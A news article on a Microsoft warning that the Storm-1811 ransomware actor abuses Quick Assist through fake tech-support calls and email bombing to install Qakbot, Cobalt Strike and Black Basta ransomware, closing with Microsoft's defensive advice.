Share this article on:
Microsoft has warned of hackers using its client management tool to initiate ransomware attacks.
A ransomware operator has been observed using Microsoft’s Quick Assist tool to dupe victims and deploy ransomware.
Storm-1811 – Microsoft’s own nomenclature – appears to be an associate of the Black Basta ransomware gang and is using Quick Assist as part of its initial attack vector.
Quick Assist is designed to be used as a client management tool, with users able to share their device – either Mac or Windows – with another remote user, generally providing tech support and controlling the device to fix a problem.
Storm-1811 uses the tool for a couple of different social engineering hacks. The threat actor either cold calls a victim and pretends to be a legitimate tech support operator performing a “generic fix” on the device or actively creates a problem to solve. This is typically a spam issue, with the threat actor signing up the victim’s email to a large number of subscriptions to create the problem in the first place.
They then use this email-bombing attack to convince the victim they’re aware of the issue and can help stop the spam.
Regardless of how the hackers make contact, once they convince the victim they’re genuine, they get the victim to give them access to Quick Assist, and then share their screen with them. The hackers then use Quick Assist’s ‘Request control’ feature to take over the advice. If the victim approves the request, the threat actor then deploys their malicious payload via either batch or ZIP files.
“Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials,” Microsoft’s Threat Intelligence team said in a blog post.
“In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.”
Through all these tools, the threat actor can move laterally within the now-compromised network and maintain persistence.
“After the threat actor instals the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement,” Microsoft said.
“Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network.”
According to Microsoft, the use of Quick Assist to ultimately deploy tools like Qakbot shows the need to focus on the early stages of a ransomware attack, not just the actual deployment of the code itself. Microsoft recommends educating users about tech support scams and even uninstalling Quick Assist in environments where it is not in use.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.